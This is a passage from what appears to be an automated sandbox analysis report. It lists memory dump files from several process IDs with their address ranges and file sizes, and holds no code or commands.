                        Filesize

                        4.8MB

                      • memory/2932-32-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2932-135-0x00000000065F0000-0x00000000068FF000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2932-195-0x00000000065F0000-0x00000000068FF000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2932-218-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2932-667-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2932-107-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2932-445-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2932-194-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2932-257-0x0000000006C10000-0x00000000075FD000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/2932-55-0x00000000012E0000-0x00000000017A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/3048-117-0x00000000065E0000-0x0000000006AA9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/3432-830-0x0000000001150000-0x00000000011B0000-memory.dmp

                        Filesize

                        384KB

                      • memory/3504-725-0x0000000000130000-0x00000000001E8000-memory.dmp

                        Filesize

                        736KB

                      • memory/3720-751-0x0000000000BC0000-0x0000000000BE8000-memory.dmp

                        Filesize

                        160KB